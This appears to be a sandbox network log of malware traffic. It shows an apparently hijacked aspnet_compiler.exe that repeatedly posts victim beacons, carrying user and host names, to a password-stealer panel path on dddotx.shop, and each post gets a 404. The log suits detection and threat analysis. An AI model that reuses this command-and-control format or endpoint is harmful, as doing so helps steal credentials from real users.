Oct 24, 2024 17:02:40.706804991 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtJivfOaxenTKizqzCB1r%2Bv4aaHT8%2B1meOxAHDGbtP0oWaaVTtfRuxUpiYogrNlqzh56%2BmAuSn8vmu9FsfgpvkHqgkYhY0MQEx1qMYTflqHnTehjoknPokWL7lpaOw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9653d082e25-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1025&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49866	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:40.993042946 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:40.998847008 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:42.062196970 CEST	780	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64Gd7D9cNAC%2BWeQi18d97O%2BFHM2cC%2FGha2Okf%2Brvc8eUFr6hqhjQPUVeiElayVGGqcziWeg%2Bi3i8867%2FUsbViiFgv1uawU7xLZdhXJ8XMwfLRL8sQOHdhZZcbqblUA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad96d9f5ce534-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1343&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49875	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:42.212672949 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:42.218169928 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:43.137540102 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dYyk%2B1aHI9sNDhPQyR3EGfuYlNJfwCjXRNV696tm84LtYrZIZKRiIExRpL1gWYXeeiPVyhxRuWQeJ76wSyNPKQDUV%2BatY%2B2GCEe6FFOY767DdHpSeeHZ9vSpvRDJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9753bf02cce-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1524&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49881	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:43.311990023 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:43.317732096 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:45.389446974 CEST	772	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ghrbr8HWaKyEIcbXbZ0uuqzCCBoVaPglJKiA339dHduFOIL1TwMzH9uHLEhdtv8%2BAJFKQF%2FhGXorIJyWH7T3YRHqZRb2ZiUn15AVXpflCNZyC8M0zoyuC9obZXehQQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad97c2e8e4763-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1786&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49893	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:45.538822889 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:45.544944048 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:46.415992022 CEST	772	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62HvQa5B1PVtYXp7fNbHdRfunOPboMmWhs%2Bo8HJKl4qKlx5vp6E5gnBlKERZ7hU%2BNUm4YLqaC2YabOPWWZLNGGRN9JUBmqaTRUXE2sB8Bnv7s9SFIzwyC7kuPzILag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad98a09c7461e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49899	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:46.574980021 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:46.580421925 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:47.642119884 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCtyULF3a9teyp%2FLzBS1NMYgl4ta5cmf14y7Dk989Y7UaACxYkUxtujmgeJVNyckk25svdwRLRtUBXMI%2B3iNGA7GxHcR0ky9ci5KmQcYX1oqL8kw%2F31l4xs0Dk6MWg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9906b014870-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49907	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:47.791491985 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:47.796961069 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:50.896435022 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wrmhXT%2FQhM99QDk7xPAxCe6xCbPwLs2OpBShj7lWk5VqdF3z4ZxqzK%2FawZtf1fg4UVkiCm6flA8%2B2hM3WJZ%2FymEZxV2TfZiol4jZzrf4AWFYwBaz51MNRjp7c44gA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad997fcc0e76e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49925	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:51.040842056 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:51.046250105 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:53.493185997 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UHUBncF3y283oCNqH1YGxN8eesV3mfiV2vyWI%2BgMmbFT0KJD%2FzZ08L3lMI1YIPKFfkCXo52fb96htnCG8KG1z3vTNO9PZWwT0bb4jjf58%2BvurtiTzrWYOn6dEz2JNw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9ac6f836c19-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49941	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:53.650609016 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:53.656101942 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:58.098172903 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrcHAnxqQ5NLlGG7dBsoh3LtMe3srdBvsIEoWOawnJKWTzeTz%2Fj%2Fdr6Ykr%2Fc46CKbZPtJXY1zCjroZ01XBN27t7j%2FuiH%2FRhYNaJAmLBSycM5SnjgV2lYjhfSqh9Cbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9bca9f82cd5-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2269&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49963	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:58.240186930 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:58.245580912 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:02:59.277235985 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:02:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsCeeoYNBLF9gQhR1iawkzcwxvxkKE07wgJiABNyzWBopfub38hYcQS%2Bm%2BmVRyYF4skuIH1U84tJ7vFEpeporZjtwmiOzgyJ7CupqV7aEu8Y%2FL5rdtD8T9i603uJxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9d96ba74672-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1147&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49968	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:02:59.437935114 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:02:59.443401098 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:00.367789030 CEST	772	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZoUv%2BPPJd0tVciBSgbcPpIv5el0L6VJEeaH2uI8f9bZP7FL8JtHi%2F44nIBMvebOBfZZzFWtZNDRQOTKrCEfc1RqVcsQhg6obYszclMjrrXLVEqTszQA3aETSEf3mmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9e0eb796b6a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49972	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:00.540592909 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:00.546133995 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:01.522497892 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1No8y1topIo6w43ZP%2B8Oy%2BYX%2FEsKUWLRZb19VBQnuBsLXc0CDobIBC8dWJHtjHU5eV6TwTSnKdmfsUEo%2FK3bNHQjCOjdzbQpzRM8EOfOuOfvQDurqfwjgFZfhw%2BLbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9e7cb453abe-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49976	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:01.666158915 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:01.672985077 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:03.971559048 CEST	770	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky3uBCX0Z19WlgeL7AA8Tw7OtrsrpN%2FCY13aQSYHqIKMRuoDOk4KGIQMP65p0bgVmq5ztY50CKny5YTEoiBpSTk5QRI7gvpnBsQiOVo6sE93BG9fdEGhpEI679oVOA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9eecb3f6b43-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49980	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:04.117002010 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:04.124053955 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:05.022277117 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdhL7acaJ6ijpM%2Fz8d%2B1fZ20YOUDVzIFzvJQH71sOKoW3Uk6vy8FTa9RK26A4z8nv0fPEUY1DCibtBVpMnXCyHDWtTtunHTk%2FN7KtmeDDGtmNb7yPDgrlMwrUqRa9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ad9fe1d9c2e63-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

